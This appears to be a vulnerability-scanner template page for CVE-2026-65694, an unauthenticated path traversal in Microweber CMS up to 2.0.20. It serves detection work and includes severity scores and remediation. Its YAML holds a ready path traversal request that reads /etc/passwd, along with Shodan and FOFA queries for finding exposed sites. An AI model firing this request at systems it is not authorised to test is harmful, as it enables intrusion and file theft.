Microweber CMS <= 2.0.20 - Unauthenticated Arbitrary File Read
CVE-2026-65694
Verified
Description
Microweber CMS <= 2.0.20 contains a path traversal vulnerability caused by failure to normalize path query parameter in static file controller, letting unauthenticated remote attackers read arbitrary files.
Severity
High
CVSS Score
7.5
Exploit Probability
2%
Affected Product
microweber
Published Date
July 30, 2026
Template Author
0x_akoko, abdugafforov-bobur
CVE-2026-65694.yaml
id: CVE-2026-65694
info:
name: Microweber CMS <= 2.0.20 - Unauthenticated Arbitrary File Read
author: 0x_Akoko,abdugafforov-bobur
severity: high
description: |
Microweber CMS <= 2.0.20 contains a path traversal vulnerability caused by failure to normalize path query parameter in static file controller, letting unauthenticated remote attackers read arbitrary files.
impact: |
Unauthenticated attackers can read sensitive files, potentially exposing credentials and system information.
remediation: |
Update to the latest version beyond 2.0.20.
reference:
- https://github.com/abdugafforov-bobur/CVE-2026-65694-PoC
- https://nvd.nist.gov/vuln/detail/CVE-2026-65694
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-65694
epss-score: 0.02456
epss-percentile: 0.83173
cwe-id: CWE-22
metadata:
verified: true
max-request: 1
vendor: microweber
product: microweber
shodan-query: http.html:"microweber"
fofa-query: body="microweber"
tags: cve,cve2026,microweber,lfi
http:
- raw:
- |
GET /userfiles/x?path=../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "root:x:0:0")'
condition: and
# digest: 490a0046304402203e139d4a0ba61e37e8b58612a7c23ac1bf4595f846bc02912fc05bbe24065ea402205227a6cbe0e313bccecabbf41d804d20190b8f3d0ff197ca3f1e4d69336a8039:922c64590222798bb761d5b6d8e729507.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-65694
CWE ID:
cwe-22
Remediation Steps
Update to the latest version beyond 2.0.20.